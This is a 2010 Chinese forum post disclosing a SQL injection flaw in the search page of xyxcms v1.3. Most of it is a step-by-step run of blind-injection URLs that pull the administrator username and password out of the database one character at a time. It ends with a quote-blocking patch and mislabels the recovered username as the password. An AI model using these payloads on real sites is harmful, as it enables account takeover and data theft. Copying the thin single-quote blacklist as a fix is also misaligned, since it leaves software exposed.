Board logo

标题: xyxcms v1.3 搜索注入漏洞 [打印本页]

作者: hyrz    时间: 2010-6-22 14:54     标题: xyxcms v1.3 搜索注入漏洞

发布日期:2010-06.19   
发布作者:mars
影响版本:xyxcms v1.3
官方地址: www.xyxcms.com
漏洞描述: 搜索页面代码过滤不严,导致字符串搜索型注入。
代码分析:s.asp 从这段代码可以看出 字符串搜索注入~

  
k=request.QueryString("k")  page=request.QueryString("page")  if page="" or isnumeric(page)=0 then   g_cur_page=1 else  g_cur_page=cint(page)   end if  

漏洞测试利用方法:

http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT CoUNt(*) FrOM admin)>=0 AnD '%25'='  猜解数据库为admin
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT CoUNt(*) FrOM admin)=1 AnD '%25'='  判断管理员就1个
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT CoUNt(*) FrOM admin Where len(username)=4)=1 AnD '%25'=' 管理员账户长度为4位
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT CoUNt(*) FrOM admin Where len(password)=8)=1 AnD '%25'=' 管理员密码长度为8位

username长度是4

http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(username,1,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=109 AnD '%25'=' 用户第一位是m
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(username,2,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=97 AnD '%25'='  用户第二位是a
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(username,3,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=114 AnD '%25'='  用户第三位是r
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(username,4,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=115 AnD '%25'='  用户第四位是s

所以密码是mars

password长度为8

http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(password,1,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=49 AnD '%25'=' 密码第一位是1
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(password,2,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=50 AnD '%25'=' 密码第二位是2
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(password,3,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=51 AnD '%25'=' 密码第三位是3
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(password,4,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=52 AnD '%25'=' 密码第四位是4
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(password,5,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=113 AnD '%25'=' 密码第五位是q
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(password,6,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=119 AnD '%25'=' 密码第六位是w
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(password,7,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=113 AnD '%25'=' 密码第七位是q
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(password,8,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=119 AnD '%25'=' 密码第八位是w

所以密码是1234qwqw



漏洞修补方法 过滤掉' 就行了


k=request.QueryString("k")   if instr(k,"'")>0   response.Write "<script>alert('error');window.close();</script>"   response.End()   end if   page=request.QueryString("page")   if page="" or isnumeric(page)=0 then    g_cur_page=1  else   g_cur_page=cint(page)    end if




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./) Powered by Discuz! 7.2